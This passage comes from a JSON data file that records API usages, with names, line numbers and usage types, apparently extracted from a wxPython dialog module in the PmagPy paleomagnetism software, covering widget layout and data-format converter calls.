"call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1527, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1534, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1534, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1536, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1539, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1539, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1593, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1593, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1594, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1594, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1596, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1596, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1600, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1600, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1607, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1607, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1607, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1620, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", 
"line_number": 1620, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1621, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1621, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1624, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1624, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1628, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1628, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1635, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1635, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1638, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1638, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1642, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1642, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1646, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1646, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1649, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1649, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1653, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1653, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1657, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1657, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.mass_or_volume_buttons", "line_number": 1660, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1660, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1663, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1663, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1666, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1666, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1667, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1667, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1669, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1669, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1671, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1676, "usage_type": "attribute"}, {"api_name": 
"wx.TOP", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1684, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1687, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1687, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1699, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1703, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1706, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1706, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1707, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1707, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1709, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1709, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1710, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1710, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1713, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1713, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1715, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1715, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1716, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1716, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1718, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1718, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1719, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1760, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1760, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1762, "usage_type": "name"}, 
{"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1767, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1767, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1779, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1779, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1780, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1780, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.radio_buttons", "line_number": 1784, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1784, "usage_type": "name"}, {"api_name": "wx.HORIZONTAL", "line_number": 1784, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 1785, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_text", "line_number": 1793, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1793, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1796, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1796, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1799, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1799, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1802, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1802, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1806, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1806, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1809, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1809, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1812, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1812, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1816, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1816, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1819, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1827, 
"usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1835, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1845, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1845, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1857, "usage_type": "call"}, {"api_name": "wx.BusyInfo", "line_number": 1858, "usage_type": "call"}, {"api_name": "wx.SafeYield", "line_number": 1859, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 1862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1862, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1868, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1868, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_samples_csv", "line_number": 1892, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1892, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1897, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1897, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1901, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1901, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1908, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1908, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1908, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1909, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1909, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1911, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1911, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1917, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1917, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1926, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1926, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1933, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1933, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1935, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1935, "usage_type": "name"}, {"api_name": "wx.BLACK", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1949, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1960, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1963, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1968, "usage_type": "attribute"}, {"api_name": "wx.BLACK", 
"line_number": 1971, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1979, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1979, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1985, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1985, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1987, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1987, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1987, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1987, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1989, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1989, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1989, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1989, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1991, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1991, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1991, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1991, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2002, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2002, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2003, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2003, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 2006, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2006, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2010, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2010, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2015, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2015, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2020, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2020, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2025, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2025, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2028, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2031, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2031, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2036, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2036, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2039, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2039, 
"usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2042, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2042, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2054, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2057, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2057, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2070, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 2076, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2083, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2083, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2129, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2131, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2131, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2134, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2134, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2141, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2141, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2141, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2144, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2150, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2151, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 
2159, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2159, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2160, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2160, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_yes_or_no", "line_number": 2166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2166, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2169, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2169, "usage_type": "name"}, {"api_name": "wx.EVT_CHECKBOX", "line_number": 2170, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2173, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2173, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2177, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2177, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2181, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2181, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2186, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2186, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2190, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2190, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2193, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2193, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2196, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2196, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2200, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2200, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2204, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2204, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2207, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2207, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2210, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2210, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2213, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2213, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2216, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2216, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2217, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2217, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 
2222, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2235, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2236, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2239, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2239, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2275, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2275, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2279, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2292, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2294, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2294, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2297, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2299, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2301, 